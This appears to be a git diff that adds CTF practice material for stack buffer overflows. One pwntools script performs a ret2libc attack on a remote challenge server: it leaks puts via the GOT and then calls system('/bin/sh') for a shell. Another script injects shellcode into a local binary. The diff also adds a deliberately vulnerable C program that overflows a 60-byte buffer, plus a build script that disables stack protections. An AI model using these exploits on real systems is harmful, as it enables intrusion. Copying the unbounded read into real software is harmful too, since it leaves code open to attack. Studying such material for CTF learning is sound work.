Renamed

StackOverflow/ASLR/answer.py

@@ -0,0 +1,30 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+import os
+context.log_level = "debug"
+context(arch = "i386",os = "linux")
+
+p = remote("hackme.inndy.tw", 7702)
+#p = process('./toooomuch')
+elf = ELF('./toooomuch')
+p.recvuntil("Give me your passcode: ")
+
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+toooomuch_func = elf.sym['toooomuch']
+payload = 0x18*'z'+p32(0)+p32(puts_plt)+p32(toooomuch_func)+p32(puts_got)
+p.sendline(payload)
+p.recvuntil("You are not allowed here!\n")
+puts_libc = u32(p.recv(4))
+
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+system_libc = libc_base + libc.dump('system')
+binsh_libc = libc_base + libc.dump('str_bin_sh')
+p.recvuntil("Give me your passcode: ")
+
+payload = 0x18*'z'+p32(0)+p32(system_libc)+p32(toooomuch_func)+p32(binsh_libc)
+p.sendline(payload)
+
+p.interactive()

StackOverflow/no-protection/answer.py

@@ -0,0 +1,15 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+import os
+context.log_level="debug"
+context(arch="amd64",os="linux")
+
+p=process('./hello')
+shellcode=asm(shellcraft.sh())
+len_sc=len(shellcode)
+payload=0x48*'0'+p64(0x00007ffff7a08118)+shellcode
+with open('payload.txt', 'w') as f:
+	f.write(payload)
+p.sendline(payload)
+p.interactive()

StackOverflow/no-protection/compile.sh

@@ -0,0 +1,2 @@
+#!/bin/sh
+gcc hello.c -g -o hello -zexecstack -fno-stack-protector -no-pie

StackOverflow/no-protection/hello.c

@@ -0,0 +1,13 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+void SayHello(void){
+    char tmpName[60];
+    read(0, tmpName, 1000);
+    printf("Hello %s\n", tmpName);
+}
+
+int main(int argc, char** argv){
+    SayHello();
+    return 0;
+}